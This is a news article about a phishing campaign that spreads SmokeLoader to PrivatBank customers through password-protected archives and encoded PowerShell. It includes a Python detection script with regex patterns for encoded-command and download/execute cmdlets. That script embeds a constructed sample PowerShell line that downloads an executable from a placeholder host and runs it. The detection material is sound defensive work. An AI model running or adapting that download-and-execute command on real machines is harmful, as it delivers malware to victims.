
PrivatBank, Ukraine’s Largest Bank, Infected with SmokeLoader Malware


The financially motivated threat actor group UAC-0006 has been identified as the mastermind behind a sophisticated phishing campaign targeting customers of PrivatBank, Ukraine’s largest state-owned bank. According to research conducted by cybersecurity firm CloudSEK, this malicious activity has been ongoing since at least November 2024. The attackers have been using deceptive emails containing password-protected archives, cleverly disguised as legitimate documents such as payment instructions or scanned copies of personal identification.

One example of a phishing lure used in this campaign is a JavaScript file masquerading as a payment instruction document. These malicious emails aim to deploy SmokeLoader malware onto victims’ systems, with approximately 24 unique instances detected in the wild thus far. The attackers have employed various techniques to avoid detection, including password-protecting the archives and leveraging legitimate system binaries in the infection chain.

The phishing emails typically contain password-protected ZIP or RAR files as attachments. When victims open the attachments and enter the password, a malicious JavaScript file is extracted and executed. This file then injects code into a legitimate Windows process and runs an encoded PowerShell command. The PowerShell script serves two main functions: displaying a decoy PDF document to mask the malicious activity and contacting the attackers’ command-and-control server to download and execute the SmokeLoader malware.
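The infection chain described above (script host launching an encoded PowerShell command that shows a decoy and fetches a payload) leaves a distinctive process-creation pattern. The following detection logic is an added example, not part of the original article or CloudSEK's research; the Sysmon-style events, the decoded script and the `c2.example.invalid` host are all constructed for the demo.

```python
import base64
import re

# Script hosts that typically run a .js lure extracted from an archive.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Any spelling of PowerShell's encoded-command switch followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Cmdlets that indicate download-and-execute behaviour in the decoded script.
DOWNLOAD_EXEC = re.compile(
    r"Invoke-WebRequest|DownloadString|DownloadFile|Start-Process|Invoke-Expression|IEX", re.I)


def ps_encode(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode()


def ps_decode(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16le", errors="replace")


def classify(event: dict) -> dict:
    """Score one process-creation event; two or more reasons means suspicious."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    reasons, decoded = [], ""
    if parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    m = ENC_FLAG.search(event["CommandLine"])
    if image in {"powershell.exe", "pwsh.exe"} and m:
        reasons.append("encoded PowerShell command")
        decoded = ps_decode(m.group(1))
        hits = sorted({h.lower() for h in DOWNLOAD_EXEC.findall(decoded)})
        if hits:
            reasons.append("decoded script has download/execute cmdlets: " + ", ".join(hits))
    return {"suspicious": len(reasons) >= 2, "reasons": reasons, "decoded": decoded}


# Constructed sample script mirroring the decoy-then-download behaviour (hypothetical host).
SAMPLE_SCRIPT = ("Start-Process C:\\Users\\Public\\decoy.pdf; "
                 "Invoke-WebRequest http://c2.example.invalid/s -OutFile $env:TEMP\\s.exe; "
                 "Start-Process $env:TEMP\\s.exe")
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [  # constructed Sysmon-style Event ID 1 records, not real telemetry
    {"ParentImage": "C:\\Windows\\System32\\wscript.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ps_encode(SAMPLE_SCRIPT)},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},  # benign admin use
]


def scan(events=EVENTS) -> list:
    return [classify(e) for e in events]
```

Run `scan()` to see the first event flagged with three reasons and the second left alone; in production the same three signals map naturally onto a Sigma rule keyed on Sysmon Event ID 1 fields.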

Researchers have noted that UAC-0006 favors phishing lures that carry malicious payloads and extensively uses PowerShell, JavaScript, VBScript, and LNK files in its attacks. This persistent targeting of PrivatBank customers suggests a clear focus on financial gain. Additionally, similarities in tactics, techniques, and procedures (TTPs) with other threat actor groups like EmpireMonkey and FIN7 hint at potential connections to Russian APT activity. FIN7, in particular, has connections to the Black Basta ransomware operation.

Furthermore, SmokeLoader malware has been actively used in campaigns targeting Ukraine, often attributed to Russian threat actors for espionage and financial gain. Recent reports have highlighted instances where Russian threat actors exploited vulnerabilities in software like 7-Zip to deploy SmokeLoader, emphasizing the severity of this threat.

The implications of this campaign are significant, as it poses a risk of compromising sensitive personal and financial data, credential harvesting, espionage, and reputational damage to organizations. Additionally, there is a potential for supply chain attacks, which could impact various associated organizations. It is crucial for individuals and organizations to remain vigilant and implement robust cybersecurity measures to protect against such threats.
